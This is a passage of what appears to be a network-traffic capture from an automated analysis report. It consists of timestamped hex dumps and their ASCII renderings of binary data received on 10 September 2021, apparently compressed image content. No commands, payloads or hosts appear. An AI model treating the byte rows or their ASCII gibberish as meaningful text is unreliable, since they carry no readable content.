                                                                                                                                                                                                                                  Data Ascii: =r99=qJ&vgLzpIIq@v|S`~ )c_1?Z80Mt.O:,Sx%1i9d`z7qx"7fs>{@FpJ7i bn[Y &3o*0?{A+jI*#[_P-M `%voISPOMj
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC88INData Raw: c0 66 36 d3 f2 3c 81 22 65 ee d5 1e 1d b5 30 ca 9d 4a a1 2a a9 db 62 a0 71 c1 52 05 f3 e4 9b 3c 74 84 c3 85 04 04 9a a7 ab df ce 9e 5a 98 6a 50 5f dc 20 8a 15 ec 18 93 4c 9c db a8 66 bc 5e af a4 58 1d c8 f4 f6 75 b0 62 da d1 92 1b 76 f2 2a fc 59 0a bb 7c fc ff 00 1d 64 b8 f2 ca 3b e9 e7 bc 6e 7e 94 87 09 a3 5a ac 1e c7 f3 77 3a 56 3a 1b f4 f7 6e 3e 36 36 3c 70 98 99 e5 58 db b4 3d ce 14 82 aa ca a7 9e 39 73 b8 70 05 73 7d 65 f8 84 95 62 55 03 17 f3 df f3 fb 8d 8f 07 31 25 d3 85 b0 96 25 c7 9b 53 7f 38 bd 7e 82 3b 02 4a f3 06 3d ad a9 30 73 27 65 36 95 ed ef 70 03 32 96 16 42 ee 00 85 e4 78 af 50 c5 46 66 3a 77 fd e9 1a 09 2e 02 58 d0 b0 34 b8 7e 67 a5 21 e1 a5 62 4d 91 97 8b 39 c8 62 20 50 af fb 40 92 82 f6 d5 55 40 b0 de e6 37 7c 91 fc f4 9a 10 51 3a ee
                                                                                                                                                                                                                                  Data Ascii: f6<"e0J*bqR<tZjP_ Lf^Xubv*Y|d;n~Zw:V:n>66<pX=9sps}ebU1%%S8~;J=0s'e6p2BxPFf:w.X4~g!bM9b P@U@7|Q:
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC89INData Raw: 8f 24 5c 07 79 1d 69 cb 1f 61 43 6d ee 1c 90 cc 42 80 4a 49 42 8f 5d 77 17 f3 e6 62 3f ed e6 e2 54 c6 2a 4a 85 c0 21 87 2c f2 b6 fb c6 cc 8d 9b 16 51 8c 1c 8e e4 22 26 58 62 8c d8 66 3d 90 15 81 2b 20 72 a0 48 a5 b8 b1 b4 fc 81 29 65 24 d5 da e6 a3 e7 bb 34 77 fd bc b5 80 1f 05 8d 41 2f 57 2f bb de 25 22 f5 01 c8 c6 93 1d a7 97 13 22 2e eb c2 51 19 77 98 ca 89 71 65 67 21 61 88 0d c6 8f 2c 4f ed e2 fa 68 71 84 27 0e 1a d9 dd da c2 ff 00 ae 50 39 9c 06 05 ad 68 1f c8 64 2d 7a 1d 59 f2 d2 25 1b d4 39 18 f9 38 99 f2 89 25 7c 55 89 31 e5 fd 35 68 98 a0 59 ad 55 bd ac c8 c5 0b 72 15 94 48 8a 4f 1d 74 f1 85 2c 19 c8 67 b7 5c 8f bd ef 0b 1e 02 54 c4 29 0a 49 4a 8a b1 15 64 7f be b4 89 0c 4d 78 e5 63 ea 51 86 02 62 e2 47 8d 17 b6 b2 47 22 de 40 c6 2e a4 34 ac 69
                                                                                                                                                                                                                                  Data Ascii: $\yiaCmBJIB]wb?T*J!,Q"&Xbf=+ rH)e$4wA/W/%"".Qwqeg!a,Ohq'P9hd-zY%98%|U15hYUrHOt,g\T)IJdMxcQbGG"@.4i
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC90INData Raw: 4c 8d ae aa 58 92 92 46 4c 65 81 f8 50 40 be af 64 91 32 50 6b 54 3f 25 57 95 72 78 ab 52 02 56 b4 bd 43 16 e8 3c a0 07 55 c9 8b 3f d3 f8 11 c1 24 5f 6f f7 4e c0 cc c4 e4 c6 26 c4 6c 79 a1 0c 3c 1e f2 c6 db 0d d9 0a 7c 74 c8 c4 06 34 d7 09 b5 3c fa 56 be cd 09 29 3f cb 15 08 2c 2b a3 f4 bf 61 9e 16 59 55 f7 f8 79 52 cb 4b 2c 07 1d e8 90 cb 28 36 9b cd 00 1b bb 0b 02 2f f7 37 9e 4d da 70 ee a4 85 11 86 ae dd f4 f3 8a d9 e0 54 0a 9f 33 ab 79 c2 db 27 02 3c 5d 6e 68 63 2d 1a 64 f7 a4 85 43 b2 ed 79 d7 bf 0b 26 df dc 2f 7c 4e ac 36 b0 3c 11 5c 36 e4 e7 6f 6a e7 d7 e2 2b d0 0e 25 1a 86 7a 6c 4e bf db be 77 8d 9c 0c a5 90 7d fe 3e e9 04 26 5c 0d 4a 0e 63 72 60 0c aa 5d 6e c4 cf 0b 1b 3e 77 a8 3c f5 c5 07 0c ed 4e 79 9a 51 fe 3c af e9 25 8b 62 09 a6 8f 6c ae 7e
                                                                                                                                                                                                                                  Data Ascii: LXFLeP@d2PkT?%WrxRVC<U?$_oN&ly<|t4<V)?,+aYUyRK,(6/7MpT3y'<]nhc-dCy&/|N6<\6oj+%zlNw}>&\Jcr`]n>w<NyQ<%bl~
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC91INData Raw: f2 a7 ce 7d 20 30 a8 8f 1f 0b 9b 79 e4 3b 81 20 85 46 60 bc 01 47 77 03 69 be 3e 3f 96 94 91 84 d4 b3 79 dd 9f cf a7 48 14 bc 4a 77 34 c9 ee f7 63 4e 95 3d 4e 5b fe b0 c7 96 3c 29 a8 95 31 e1 ab 4a 4a 9b 59 24 42 56 36 fc f6 e2 0a 05 50 3b ab af 70 32 88 58 7c 37 bb 9a e6 cd e9 5e 5a 42 bc 5a 8e 13 b0 05 df 52 0f e1 dd f4 a5 60 17 d1 19 a6 09 62 3b a4 fb 46 c5 22 75 82 40 3d ed 64 b3 f1 ee 42 14 96 16 08 af e3 a7 f8 c4 b9 cd 85 1e ba b9 cc 8d 00 ce 99 34 0b 81 00 63 39 d4 b7 7d 2b f9 11 28 b3 45 2f ac f2 a2 57 73 04 da 89 74 66 bf 2d b1 a9 ab c8 23 8e 7a 55 69 79 24 f6 ed fd 65 ce b0 e4 a9 a7 ef 84 f2 37 b8 cd 87 a7 c6 71 d1 bf a4 f1 6f 7c 0c 60 2d 3b 4a fe cf fa 48 53 b2 c1 a0 14 72 19 b9 f8 ba 20 75 88 fa 8a 92 14 a7 26 f9 77 ad 0e 7e f1 f4 2f a5 a8 af
                                                                                                                                                                                                                                  Data Ascii: } 0y; F`Gwi>?yHJw4cN=N[<)1JJY$BV6P;p2X|7^ZBZR`b;F"u@=dB4c9}+(E/Wstf-#zUiy$e7qo|`-;JHSr u&w~/
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC93INData Raw: 7e f0 45 8c fe 90 25 c9 b8 98 fb 0d 9e 2c 7c 57 52 0b 63 76 ea e0 ee 7f 76 84 d7 23 c2 ba 06 35 d2 ce 5c 81 e9 98 e5 13 99 99 59 50 48 8f b0 cc f3 85 78 23 32 08 d6 48 b7 48 66 80 10 0a 89 53 b9 22 47 23 a9 20 10 a4 ed e8 c6 6b 24 17 ce d7 1c e9 09 cb e1 d1 8a 85 4e 1d dc 50 00 1c df 3f 22 2f 58 18 c8 c5 90 4a b9 3d 99 a1 8f 13 20 ca 13 72 c8 f1 d9 fd 35 79 97 80 40 27 f6 90 37 02 40 02 ec 2b 41 1f f2 e2 66 62 cf 72 7b af 3b c5 b4 99 88 fb 4a 92 cf 8a 96 f4 73 cb 6b c4 b4 1a ee 5b 26 44 bf ab 24 72 48 8a 5f 7c 88 c3 b4 4b 28 56 dc 0b b4 6c 4d b5 01 67 8e 45 81 2a 76 e7 2b 57 f3 e9 f9 8e 2f 83 48 18 95 47 b3 7a 3b 31 bd 34 6e 86 30 c1 92 91 65 2e 46 40 9f 26 29 5a e5 59 1d d0 41 ee 06 29 0b 0b 12 23 a1 24 a9 03 91 ee be 98 44 d0 cf 74 fb 77 9e 90 41 2c fd
                                                                                                                                                                                                                                  Data Ascii: ~E%,|WRcvv#5\YPHx#2HHfS"G# k$NP?"/XJ= r5y@'7@+Afbr{;Jsk[&D$rH_|K(VlMgE*v+W/HGz;14n0e.F@&)ZYA)#$DtwA,
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC94INData Raw: 33 69 af b6 f1 4b f4 8e 24 cc 18 43 b5 89 63 93 7b 82 fe da c5 8d f4 5e 11 1e b8 c0 cb 7e e4 cd a8 69 32 4f 0e 43 28 92 39 66 81 17 7c 6c 01 0b ef 8e 2d b7 7c ee ba b1 c6 77 8a 98 0f 0e a4 9f e4 97 04 0a 53 5d 39 b6 79 45 da 65 ff 00 c9 8d 35 04 16 26 e3 cf 96 b1 64 3d 56 e9 03 68 3a 83 e3 b6 3e 5c 71 a4 2c a4 2e cf d7 89 a8 b1 5e 6b 67 80 4d 9f ef 7d 55 f0 e4 e1 00 91 90 0c 72 16 7d d9 9d 81 14 78 62 62 43 58 39 f2 7f 7f 2b 75 85 3f ad 62 ff 00 8d c8 d5 d0 49 16 b4 98 98 cc 22 52 b1 ac d8 10 c8 18 ab 82 28 99 42 c9 1d d7 b4 11 7f b8 75 7d c2 27 0c 94 a6 84 b9 b6 64 9e ed 48 ab e2 30 24 15 ff 00 95 01 d3 6e 7f 9f 51 1f 54 60 62 1c 49 62 c5 54 c7 5c 39 60 79 4c 43 71 64 cd c7 57 c6 cc 89 ff 00 6b 77 77 98 d9 40 25 67 8f 8a a1 d3 e8 25 14 20 1c 4d 4b d9 9f
                                                                                                                                                                                                                                  Data Ascii: 3iK$Cc{^~i2OC(9f|l-|wS]9yEe5&d=Vh:>\q,.^kgM}Ur}xbbCX9+u?bI"R(Bu}'dH0$nQT`bIbT\9`yLCqdWkww@%g% MK
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC95INData Raw: 87 00 2c 18 16 11 57 35 72 d3 4d a7 63 49 1e e8 cb 77 8a d9 dc 56 12 42 6e 1f f8 40 66 bf 9b 37 7d 76 96 a7 20 7d be 20 ee 35 1e de 55 80 0c cc cf f8 cc bc d0 6a 5c 44 9e 44 b3 c3 3c fe d8 8e ef fa 82 31 dc 0f 80 07 8e 3a 60 d4 16 ad 32 dd d9 fd bb 78 19 23 ee 26 a2 c6 ae 35 ef ba 8c 79 79 6d 16 2e 98 f5 ba 35 85 5b 83 ed 90 4a ed 34 ee c1 49 04 95 db 60 6d 3f 36 3c 74 10 9b b8 6a 3d 45 d9 9a a7 9c 16 71 7c 24 56 df c7 ba 6b f9 30 25 ea e8 22 c7 ce 54 0e b2 8c 9e dc 86 d8 15 5d d7 ec 21 40 21 54 2a b2 83 74 7e 4f 9e 99 e1 9e b9 07 a9 d8 35 f6 36 ec c2 d3 d4 90 1c 90 0b 3d eb 7a d2 f9 d9 ab cc 44 06 26 13 65 cd 02 96 0a b1 4a 6b e0 10 b4 46 db f3 64 78 b1 c7 4c ce 5b 21 83 00 74 d0 5b f5 6d 4b c0 92 9c 75 04 56 df af c4 4b 7a e4 b4 3a 16 a9 34 8f bc 1c 7e
                                                                                                                                                                                                                                  Data Ascii: ,W5rMcIwVBn@f7}v } 5Uj\DD<1:`2x#&5yym.5[J4I`m?6<tj=Eq|$Vk0%"T]!@!T*t~O56=zD&eJkFdxL[!t[mKuVKz:4~
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC96INData Raw: 92 43 c9 16 46 ea 36 00 e0 90 07 00 7e 60 0e 17 a0 53 db c2 e4 0d 1c 6f af ee 18 96 92 92 0d 07 86 a4 9d 4d 03 6a 05 44 7b c5 5e e4 c1 e3 21 6c 01 23 02 09 0a cc 0c 8a ea 69 5c 28 bb 1f b8 73 5e 4d f4 2c 12 0b 33 55 c2 59 c7 cd 3a c7 66 2d 40 90 54 14 08 20 6e 45 32 da a3 3a 03 a4 4f 7d e4 a8 c1 22 97 e1 c2 3c 64 22 a5 ab 2b 45 22 85 00 ac 80 92 4d 0f 3b 0d 91 d4 96 ba 82 2b ad 2f 90 d0 e7 eb 0a 80 18 92 2b 5c aa 6b 66 bd b5 8d ed 33 38 a4 32 44 64 94 3c 6c cc 80 30 78 d5 af 72 bc 64 9b ec aa 96 04 01 60 9f c8 ea 48 51 53 b8 6b 77 d9 82 12 92 9f e1 56 ab 0d c3 30 0c 7c ec 60 8b 11 a3 2a ee a8 b2 23 73 bb 69 26 24 6e 08 d9 63 b8 84 12 c0 0e 43 59 a3 e3 a2 27 f9 0e 70 15 80 10 41 60 70 b7 36 ca db 00 da f3 8d ce eb a4 5e f6 d8 1a d4 34 92 0b 1b 4d 80 14 f3
                                                                                                                                                                                                                                  Data Ascii: CF6~`SoMjD{^!l#i\(s^M,3UY:f-@T nE2:O}"<d"+E"M;+/+\kf382Dd<l0xrd`HQSkwV0|`*#si&$ncCY'pA`p6^4M
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC98INData Raw: 58 53 e1 41 42 72 b2 2e a3 8d 26 74 c7 64 82 23 ba 5c 55 74 a2 07 71 87 26 b8 7d 3d 28 26 63 d2 b4 6b bd 2d 43 7d 29 9c 59 4b fa b2 f0 84 00 45 89 39 06 2e 74 db e2 09 f4 2f ad df 53 34 5c d9 8f a5 7d 49 8d 13 ee 59 95 70 75 09 24 d2 f3 92 37 2b 32 88 e6 c6 91 f0 e0 58 da 9e 41 1c 5e e3 65 aa 9b a1 2b 80 42 94 00 50 0f 93 8c f4 2e 5b bc a1 9f fe e7 32 68 62 5f 0b 1a 39 76 e5 af 66 2c 77 a0 ff 00 ab 9c ad 67 28 e8 7e bb cd c1 d0 b5 f8 3b 51 26 0e a1 f6 d2 69 99 86 8b 24 f0 6a f1 93 31 49 bf 6c 92 31 67 42 69 a3 5b 24 02 7f d3 d5 28 3a 52 a5 8d 52 0f a6 5f 10 d4 9e 3a 5c c2 ca 52 10 74 25 bd ce c7 ba 45 b9 d2 7d 4d 81 ea 3d 3d 67 c5 11 c4 5b 1d 9b b4 64 83 2a 04 9e 54 0d 13 e3 b4 72 3a c9 19 52 4c 73 06 f0 68 a2 f5 51 34 14 a8 05 02 0d 98 86 2e e4 67 16 92
                                                                                                                                                                                                                                  Data Ascii: XSABr.&td#\Utq&}=(&ck-C})YKE9.t/S4\}IYpu$7+2XA^e+BP.[2hb_9vf,wg(~;Q&i$j1Il1gBi[$(:RR_:\Rt%E}M==g[d*Tr:RLshQ4.g
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC99INData Raw: 43 be 93 fa 89 32 b4 74 81 a4 69 1f 4d 58 f0 e7 62 e4 83 8e cc 16 09 90 12 49 50 4e cb af 2a 79 3d 5b 70 ca 61 47 ca d5 39 9c c1 7a 79 eb 14 7c 5a 0e 23 84 3d 28 d7 b1 7f 5a fa e4 61 de df b6 81 3c 1f 07 e3 cf fb 03 e7 ff 00 47 ab 10 a2 bb bf 30 4f bb ef 6e b1 59 36 59 4a a9 4d dc d4 67 e4 63 e6 9f 91 dd 5a e1 49 af 8b ff 00 bf ff 00 2f ed cf 52 03 08 6f 58 3b 90 90 1f 34 86 6b eb e9 dd 22 59 81 35 bb 77 ed 34 08 34 c0 70 47 fa 5d d1 f2 3f 3d 74 5c 69 4f 7d 60 73 6a 96 19 90 23 45 92 ec 37 07 c8 34 16 ff 00 17 f2 7f f9 79 fc 74 c2 bf 85 77 6f 4f 98 5e 5a 02 66 68 d5 f5 f4 bf a6 51 aa d5 ba b7 50 bb e6 be 3e 2f 8e 09 fc 9f fe 7d 22 56 af d3 7e 9f a7 48 6b 1a 5e c7 a7 f7 1b 51 bd 52 82 05 70 7f f1 02 2f ff 00 af fa ff 00 b9 f6 25 eb e9 f3 fa 88 15 97 2d 41
                                                                                                                                                                                                                                  Data Ascii: C2tiMXbIPN*y=[paG9zy|Z#=(Za<G0OnY6YJMgcZI/RoX;4k"Y5w44pG]?=t\iO}`sj#E74ytwoO^ZfhQP>/}"V~Hk^QRp/%-A
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC100INData Raw: 55 83 1b 34 98 6a b1 48 cc a4 51 66 2b c9 b1 75 56 a8 9f 20 86 71 88 d4 d4 3f 22 de 95 a8 0f ac 54 ab 85 9b 89 41 40 b0 fc 69 97 94 07 64 7a 37 58 c2 ca 77 c1 d5 8b 24 c6 32 93 64 b4 8e 85 18 58 32 56 f5 57 1e 4b 10 19 89 aa 27 a6 13 3a 5e 12 48 72 f4 7a 7e 6f de 90 9c d4 92 c0 64 59 a8 cf 9e cf 12 5a 3e 4e 5e 9f 92 52 6c ec cc 4c a9 0c b1 3f 63 33 25 34 cc b6 48 ff 00 44 9c 84 75 38 a4 b0 21 81 25 19 98 11 7d 05 53 31 10 07 96 81 ab a5 4b 52 24 99 53 14 86 c7 f6 da af cf 23 6d a9 0d 2d 27 d6 f9 d1 34 72 43 0e 7e 43 6c 8d bb 3f e2 79 b8 d3 63 4c 80 ac 8d 04 c6 16 83 26 3b a7 07 78 72 bf 16 6b a0 cf 91 22 65 56 01 1a f5 b7 63 9b c3 dc 24 c9 d2 e8 99 a5 46 b4 ff 00 b3 df 6a 08 6c fa 5f eb 97 d4 df 4d ea 78 d9 fe 90 f5 1e a5 a4 6a 78 75 85 99 85 97 92 f3 89
                                                                                                                                                                                                                                  Data Ascii: U4jHQf+uV q?"TA@idz7Xw$2dX2VWK':^Hrz~odYZ>N^RlL?c3%4HDu8!%}S1KR$S#m-'4rC~Cl?ycL&;xrk"eVc$Fjl_Mxjxu
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC101INData Raw: 17 e9 52 95 29 cd e9 88 90 fd b7 58 cc f1 7f 59 28 99 87 47 6a fb 79 02 3d 36 aa 7e ae fe a1 fd 4f ad b1 cc 74 c5 d2 34 bc 5c 86 9a 39 b0 d7 54 4c ac b8 8b 10 21 2b 1e 4b 24 8f 92 4e d4 ef 46 25 94 d9 20 2f 1d 5d 70 bf 4c e1 90 31 26 5a 54 a1 56 2d 60 cf a9 61 e7 5f 2a 0e 37 eb 7c 4c c1 81 2a 35 ad 09 c8 de c7 b7 b1 85 76 5f a9 b3 f5 f4 49 24 9d bd 33 f7 13 3f dc 62 8c 89 64 d5 40 9d 3b 8b 97 a9 ce ec 52 0d f1 35 47 8b 0b 19 11 7d a5 81 20 0b 69 6a e1 d2 30 7d 90 96 a3 e8 06 6f f9 b3 8d 62 86 74 ce 2a 7a f1 3d 0d 35 60 6a d6 7d be 22 6b fc 7f 48 c3 86 0c 7f 4f 60 e6 6b b1 23 bc 8b ad 6a b0 cf 16 56 6c f1 44 06 44 d8 cb 93 b9 62 c7 49 2c 41 1c 62 a6 44 f3 4d 65 79 eb 40 7c 0c 06 5c a8 db 9f 57 35 ac 4d 12 d6 08 0b 0e 79 5e 9a 57 3d 7c e2 13 23 42 f5 97 ab
                                                                                                                                                                                                                                  Data Ascii: R)XY(Gjy=6~Ot4\9TL!+K$NF% /]pL1&ZTV-`a_*7|L*5v_I$3?bd@;R5G} ij0}obt*z=5`j}"kHO`k#jVlDDbI,AbDMey@|\W5My^W=|#B
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC103INData Raw: 83 a8 09 4e 5c 33 e1 e3 e6 0e ce dd c9 38 8d 53 35 54 ad 82 54 09 a6 0b 47 6b 29 15 e7 ab 11 75 74 7b d4 d5 bd 36 ce b0 94 2f 22 ef 62 e7 e6 66 61 ce d9 06 2c 51 96 d1 82 49 c8 5d 3a 41 2d b8 e3 de f8 ee 53 72 8d dc 8f c5 74 ce 44 1d 0e d9 7a 6f 5b 72 84 d6 54 14 1b 67 d8 39 ac 69 ea d8 18 7a a0 d5 c4 5b 12 2c d4 c7 ce 8b 62 d0 10 e4 e3 c9 1c ed c0 e6 48 df 61 71 5c 94 07 cf 3d 0f 87 fb a1 61 55 c0 ee a6 70 18 d2 de 95 cd cc 0f 8a fb 6a 4b c9 15 6f 15 6a f9 b8 15 af 74 85 76 3e 56 6e af a6 4b 07 73 bb a8 e8 6f d8 2b 22 b5 98 63 91 a2 91 26 2c 41 da a0 47 b1 a8 94 2d ee e2 ea dd 23 ec cf 44 dc d4 07 99 bb 53 32 73 6d a2 b9 24 2f 87 98 95 8a 83 47 d6 84 b3 e5 cf 7e 9b 78 d9 72 e4 7a 7a 39 c4 6a 92 61 64 47 11 66 62 81 57 1e 6d bc a8 24 f7 22 e7 df fb 4a f3
                                                                                                                                                                                                                                  Data Ascii: N\38S5TTGk)ut{6/"bfa,QI]:A-SrtDzo[rTg9iz[,bHaq\=aUpjKojtv>VnKso+"c&,AG-#DS2sm$/G~xrzz9jadGfbWm$"J
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC104INData Raw: d4 1a 6c 0e ad 4d 98 25 26 ce df 7b 00 08 27 8e 54 13 43 cd f1 e7 a9 f1 9f f8 fc ff 00 6e fe 54 cc 08 3c 8c 0a c2 1f 5a ef 71 4a 66 f9 ec 43 b4 48 7d 4d af f0 cd 7e 38 db d8 cf 91 da b0 00 29 b0 ee 0b e2 c8 23 8f 16 7c 1f 37 2f a4 8a bf be bd 8f 36 8a ff 00 aa 7f 2f ff 00 cb d9 fe 21 35 e9 dc 78 df d3 fa c9 50 d1 bf 67 48 64 75 3f e7 19 39 29 23 10 78 ba 71 c1 f9 51 5c f1 d5 d4 ff 00 e4 2a 6a b1 ad 05 29 de c7 47 ae 94 ac 20 e6 fb 3d c0 bf 76 3a 44 43 91 2f a9 f4 f9 0b 29 13 36 23 29 77 da 1c 22 88 cb 5d 71 ca 80 4d 03 7f db a9 4c ff 00 fa 59 a0 3f f0 c9 b3 bd 33 66 f4 d6 21 26 9c 4c b6 67 c4 f6 d4 d3 cb 7a 0b 52 2f 62 fa af 37 07 49 83 07 4d db 2e 66 5e 3c 58 70 44 87 7b 5b c6 03 35 00 37 6c b2 77 12 a2 21 ef 3c 0a eb 10 99 29 fb aa 98 bf f1 51 a9 6d 6f
                                                                                                                                                                                                                                  Data Ascii: lM%&{'TCnT<ZqJfCH}M~8)#|7/6/!5xPgHdu?9)#xqQ\*j)G =v:DC/)6#)w"]qMLY?3f!&LgzR/b7IM.f^<XpD{[57lw!<)Qmo
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC105INData Raw: cb 81 56 4c 86 07 70 a2 24 e2 f7 92 76 93 60 0d 9b 78 05 bd c1 88 eb c9 94 54 87 ae 67 37 e7 ed 6b c1 a5 cd c2 9c 07 d4 e8 72 cb 68 26 86 4c ab 34 e4 6d d8 d4 ca 2a 30 14 2d 16 03 93 c1 23 8f 3c f8 eb 89 2b 49 6a 80 18 73 67 6b ef 4d f3 8e 27 09 c6 4b 02 e7 41 ad 06 d4 7b fe b6 98 99 1d 8a 6e 8a 5e 01 53 ef 52 c5 47 ea 55 05 f6 d1 23 c1 3b 8f c0 e8 8a 96 85 9c 58 99 f2 a4 09 4a 0c 6b e1 04 91 67 eb 5c de 9f 98 f9 24 13 c4 41 07 60 24 54 c0 8e cb a5 5d 58 34 ac 4d f0 c0 1b e3 f8 ea 04 7d bf e2 5d c5 dc 7b 67 7f c5 60 40 bb f7 df b6 91 af 2e 4b c3 c3 49 21 8a 4e 5d d4 2e ed ff 00 b6 e9 ac 82 7c 12 7d b5 7e 4d 74 22 b2 92 e6 83 77 6d 6d 5b eb 96 d1 30 1e d7 11 18 f9 a5 0a d0 59 95 e4 2e 94 40 db ba c7 be b9 f8 00 6d 3c 91 5f 9e b8 ef 5b bc 48 28 04 94 aa 80
                                                                                                                                                                                                                                  Data Ascii: VLp$v`xTg7krh&L4m*0-#<+IjsgkM'KA{n^SRGU#;XJkg\$A`$T]X4M}]{g`@.KI!N].|}~Mt"wmm[0Y.@m<_[H(
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC107INData Raw: 4e 6c 29 00 1b 00 74 fa a6 4b 9c 82 31 83 4c eb 70 43 74 8a 65 09 f2 e6 b0 41 4a 41 0c c1 9e c4 b5 00 ce e2 ba bc 5a ff 00 a5 7f 55 cf a9 74 41 8b 93 34 9f 79 86 bd bc 9c 3c b5 3d f0 40 65 77 87 79 0e 51 4a 9b 56 ff 00 96 69 6c fb 6e 82 74 93 2e 61 52 43 8b 9c 9a f7 ca d9 f9 c5 e4 b9 ff 00 f1 a7 10 f3 db 2c e8 6f 7a e5 19 3d 6f 22 98 b7 ad 80 d1 6e 0b c0 24 15 f2 c6 fc 8b a2 0d 11 f0 08 e7 ae ca 75 ad ca 5a df bf 48 ea e6 02 95 95 16 18 58 0c 85 bc cb 0e ba eb c6 bf ea b3 22 2c a8 b5 38 20 76 de 90 65 23 10 48 ed 07 1b 48 24 1b 25 87 e3 e7 c8 ae b7 5f 44 18 4a 15 90 21 c0 2d 60 7a e6 6b 9f 9c 7c e3 fd 54 13 f6 b1 3d 58 b0 a9 35 2d d3 53 d3 78 a8 1f 45 f0 de 26 d6 de 29 0a 49 87 a0 e7 64 b2 d3 05 91 42 b8 f2 47 bb 79 e2 f9 20 7e 4d f5 a9 e3 66 ff 00 c9 2c
                                                                                                                                                                                                                                  Data Ascii: Nl)tK1LpCteAJAZUtA4y<=@ewyQJVilnt.aRC,oz=o"n$uZHX",8 ve#HH$%_DJ!-`zk|T=X5-SxE&)IdBGy ~Mf,
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC108INData Raw: 0d f3 cd 9b 20 f3 7e 3f b7 53 62 a1 ab 53 da dd f9 c4 66 29 88 c3 4a 39 e6 fd da 3c c2 ee f9 71 34 a4 18 e2 dc ca bf ff 00 70 81 45 ec 73 b0 0d ab 5c 8b f9 ab ea 18 b0 97 35 06 8c ce db df 63 e6 da 44 89 0b b9 7d 32 af a6 5c fd d8 8d 72 12 0d 3f 27 30 b2 21 58 e4 a7 73 4b 19 20 f3 5c 8f 68 14 07 fa d9 3c f5 d1 35 c8 0d 5c a9 e7 99 6d 22 65 49 4a 14 40 6b 3e 7e 57 f4 ae d0 a5 c8 d3 8e a5 e8 dd 6b 2e 62 84 6a 2f 93 2c 25 2a 39 47 72 56 08 1d b9 3e f1 b6 b9 bb 37 e2 ba e4 c2 e3 c1 d4 dc d4 6f a7 7a c7 65 a0 25 27 c2 c1 4e 5a c0 96 bb de fd d6 39 cf fd 42 e4 31 c9 9f 1d f1 d1 22 6c 56 c0 8a a9 5d e4 d2 f0 63 95 91 da c8 67 ee 9f dd f2 cf 55 d2 f6 77 a3 50 be de fe 65 f2 86 78 64 a4 a0 92 2a fa 9f cc 51 4d 7f 6f d9 be 6c f0 fd b4 10 c7 0a 29 5f 79 79 c8 2c 51
                                                                                                                                                                                                                                  Data Ascii: ~?SbSf)J9<q4pEs\5cD}2\r?'0!XsK \h<5\m"eIJ@k>~Wk.bj/,%*9GrV>7oze%'NZ9B1"lV]cgUwPexd*QMol)_yy,Q
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC109INData Raw: 62 48 49 05 3f c5 b4 7f 2f 3e a6 2b 27 af bf a7 18 5f 38 e7 45 8f 1c 2f 04 60 77 60 75 8e 58 c4 8c 54 c1 90 42 85 c9 46 67 2a 21 90 37 b7 95 23 a7 a5 f1 e6 cf 93 75 a6 bc e2 ba 6f d1 d0 6a 12 2a 1a e6 83 5d 29 7f 38 af 7e a9 fa 43 ea 4f 4c 47 da c2 93 bb 8a ec 09 82 2b df 01 3c d4 48 c0 fe 88 6a 61 18 62 10 ee 08 00 34 0c 8e 26 5c e2 c4 87 19 be 56 af a5 75 ea f5 fc 47 d3 54 84 b2 72 a7 2e 57 d9 f9 c0 1c 30 e4 e2 b3 0d 46 16 8b 23 2a 3f b1 cb 0a f6 32 31 92 c7 dd 43 1b 9d b0 e4 23 00 ca e9 db 70 e8 39 f1 66 58 41 05 8d d8 fb 3f eb fb 02 b4 c8 9b 2c 86 c5 fc 9d 54 26 97 66 fc 5b 68 7c 7a 2b d4 92 61 c3 8a 99 19 59 ee d8 ad 8c 94 36 9c a9 22 73 b1 33 06 de dc 86 68 15 52 7e e3 34 a3 bb 1f 8b 20 f5 5b c4 48 0a 2e c1 41 ad 4a d6 a5 89 a5 8f b4 5c 70 b3 56 90
                                                                                                                                                                                                                                  Data Ascii: bHI?/>+'_8E/`w`uXTBFg*!7#uoj*])8~COLG+<Hjab4&\VuGTr.W0F#*?21C#p9fXA?,T&f[h|z+aY6"s3hR~4 [H.AJ\pV
                                                                                                                                                                                                                                  2021-09-10 09:11:43 UTC110INData Raw: 83 12 7c b6 ee 07 0a d6 b9 1e d6 23 69 2b 40 f3 d2 b8 d5 35 d9 4b 20 12 05 ad b5 3d 9e 3b 2f fe 33 85 41 2e 6c f7 b5 ad ea 2a 2a f1 a1 f4 0f ea fe 87 eb 5f 4b 61 7a 8f 07 2a 32 fe a2 d5 b5 cc cc 42 65 86 db 1a 1c e9 61 85 11 51 88 58 9b 15 16 66 63 65 9e 41 cf 3c 31 25 0a 5c b7 96 a5 20 24 5c e7 e7 5a f2 a0 36 8f 4f 9a 12 b0 95 00 b0 a2 28 f4 0f 6a 8d cf 9d 61 df eb 1f ab 3a 67 a6 b0 61 79 35 1c 75 cd ca 30 e0 e0 44 d2 20 99 b2 73 19 62 87 b4 a8 41 0a af 6c ec 17 f6 a9 fc 75 5d 37 8a 58 51 48 05 d3 e1 7d 4f ef 95 c0 6a 43 a9 94 82 00 05 81 0e d4 27 d5 cd b7 f4 8f be 96 f5 f6 26 b1 af 36 3c 19 63 2b fc 0f 18 0c d9 99 dd d1 f5 4c 88 c1 78 42 a0 55 ff 00 86 c7 06 53 bf 73 5c c8 68 58 3d 37 2a 72 95 2c a8 50 d2 ed ae 8d 56 f7 bc 75 52 e5 cb c2 4a 99 ed 4d 0b
                                                                                                                                                                                                                                  Data Ascii: |#i+@5K =;/3A.l**_Kaz*2BeaQXfceA<1%\ $\Z6O(ja:gay5u0D sbAlu]7XQH}OjC'&6<c+LxBUSs\hX=7*r,PVuRJM
